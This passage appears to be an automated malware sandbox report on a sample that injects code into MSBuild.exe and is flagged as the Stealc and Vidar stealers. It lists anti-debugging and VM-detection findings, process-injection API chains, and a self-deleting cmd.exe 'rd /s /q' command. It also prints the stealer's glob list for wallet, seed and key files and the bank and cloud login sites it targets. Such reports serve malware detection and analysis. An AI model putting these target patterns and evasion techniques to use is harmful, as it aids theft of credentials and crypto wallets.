Snapshot4888Active Tsc Count Snapshot
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition.dllQ/E
Source: Web Data.18.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: chrome.exe, 00000009.00000002.1490824938.0000011BC01F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorsysc.
Source: Web Data.18.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: chrome.exe, 00000009.00000002.1490824938.0000011BC01F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000025.00000002.2129095620.00000E7C019A4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC2560000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTocVMWare
Source: Web Data.18.dr Binary or memory string: discord.comVMware20,11696428655f
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC249F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partitionlo
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000025.00000002.2128136639.00000E7C017B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=3edc3865-a0d9-4df1-939a-c974344b9bab
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC2496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 00000009.00000002.1506251810.00006274015C4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=b3ff1377-df22-425b-a9f4-1bba31219f14
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC2496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: Web Data.18.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC2496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition
Source: chrome.exe, 00000009.00000003.1453764093.0000011BC258C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034D
Source: chrome.exe, 00000009.00000002.1490824938.0000011BC01F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor7/Z
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC2496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes.
Source: chrome.exe, 00000025.00000003.1854659335.00000E7C003E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: Web Data.18.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.18.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor|'
Source: chrome.exe, 00000009.00000002.1490824938.0000011BC01F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorsyss/
Source: chrome.exe, 00000025.00000002.2128136639.00000E7C017B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=3edc3865-a0d9-4df1-939a-c974344b9babUSB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=3edc3865-a0d9-4df1-939a-c974344b9bab
Source: Web Data.18.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Web Data.18.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Web Data.18.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.18.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.18.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msedge.exe, 00000011.00000002.1607322123.0000022A74E45000.00000004.00000020.00020000.00000000.sdmp, eKQjcS7RNcSarFuG.exe, 00000022.00000002.2733368136.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2015907041.0000023518FF3000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000032.00000002.2163977299.0000025742A44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Web Data.18.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.18.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: chrome.exe, 00000009.00000002.1487568230.0000011BBC4C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[[
Source: Web Data.18.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.18.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC249F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: Web Data.18.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Web Data.18.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.18.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: chrome.exe, 00000009.00000002.1487568230.0000011BBC532000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partition.dll
Source: chrome.exe, 00000025.00000002.2129909613.00007FF808211000.00000020.00000001.01000000.00000008.sdmp Binary or memory string: xVMcI
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor
Source: Web Data.18.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionty
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00449B30 LdrInitializeThunk, 29_2_00449B30
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF6815125E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6815125E4
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_00404980 VirtualProtect 00000000,00000004,00000100,? 32_2_00404980
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004108E0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_004263C0 mov eax, dword ptr fs:[00000030h] 32_2_004263C0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF68151D7BC GetProcessHeap, 0_2_00007FF68151D7BC
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF6815125E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6815125E4
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF6815161C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6815161C0
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF681511FB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF681511FB4
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF681512788 SetUnhandledExceptionFilter, 0_2_00007FF681512788
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF706682788 SetUnhandledExceptionFilter, 26_2_00007FF706682788
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF706681FB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF706681FB4
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF7066825E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF7066825E4
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF7066861C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF7066861C0
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B11FB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 30_2_00007FF707B11FB4
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B12788 SetUnhandledExceptionFilter, 30_2_00007FF707B12788
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B125E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_00007FF707B125E4
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B161C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_00007FF707B161C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 32_2_61EAF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 32_2_61EAF8FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2212, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\v7942.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\ProgramData\ph4eu37qie.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\zmgdjecba1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF681511560 GetModuleHandleW,GetModuleFileNameA,_fread_nolock,FreeConsole,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 0_2_00007FF681511560
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\ProgramData\ph4eu37qie.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\zmgdjecba1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Searches for specific processes (likely to inject)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411250 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle, 3_2_00411250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411310 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle, 3_2_00411310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 32_2_004246C0
Writes to foreign memory regions
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000 Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000 Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 425000 Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 426000 Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 427000 Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000 Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 110F008 Jump to behavior
Source: C:\ProgramData\ph4eu37qie.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\ProgramData\ph4eu37qie.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\ProgramData\ph4eu37qie.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000
Source: C:\ProgramData\ph4eu37qie.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 451000
Source: C:\ProgramData\ph4eu37qie.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45F000
Source: C:\ProgramData\ph4eu37qie.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 67E008
Source: C:\ProgramData\zmgdjecba1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\ProgramData\zmgdjecba1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\ProgramData\zmgdjecba1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000
Source: C:\ProgramData\zmgdjecba1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 437000
Source: C:\ProgramData\zmgdjecba1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 64A000
Source: C:\ProgramData\zmgdjecba1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C2F008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\v7942.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\ph4eu37qie.exe "C:\ProgramData\ph4eu37qie.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\zmgdjecba1.exe "C:\ProgramData\zmgdjecba1.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\xlng4w479r.exe "C:\ProgramData\xlng4w479r.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\f3ohl" & exit Jump to behavior
Source: C:\ProgramData\ph4eu37qie.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\ph4eu37qie.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\zmgdjecba1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 11
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF681522020 cpuid 0_2_00007FF681522020
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree, 3_2_0040FC20
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF6815124BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF6815124BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00417210 EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW, 3_2_00417210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 3_2_0040FBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 32.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.2340668311.0000000001027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2338379546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2212, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6904, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: MSBuild.exe, 00000020.00000002.2338379546.0000000000567000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
